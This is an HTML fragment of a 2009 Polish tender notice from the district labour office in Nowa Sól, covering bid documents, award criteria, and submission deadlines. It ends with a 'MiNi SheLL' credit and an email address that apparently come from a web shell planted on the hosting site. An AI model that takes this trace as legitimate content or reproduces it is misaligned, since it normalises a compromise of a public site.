2.	Oferta winna zawierać oświadczenia i dokumenty dla każdego partnera z osobna dotyczące własnej firmy o których mowa w części VII SIWZ pkt. 2, 3 i 4.
UWAGA:
Do celów niniejszego przetargu dopuszcza się przedłożenie wymaganych dokumentów w formie odpisu lub kserokopii poświadczonej przez Wykonawcę /za zgodność z oryginałem/ (wyjątek stanowi pkt 7).
W przypadku przedłożenia kserokopii dokumentów, które składają się z dwóch lub więcej stron - należy poświadczyć /za zgodność z oryginałem/ każdą z tych stron..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie kadry dydaktycznej - 50</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.nowasol.ibip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Staszica 1C, 67-100 Nowa Sól - pokój nr 315- III piętro,faks (068)3873242, mail zamowienia@pup-nowasol.pl i zino@praca.gov.pl w godz. 07:00 do 15:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Nowej Soli, ul. Staszica 1C - pokój 107 (I piętro)- Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com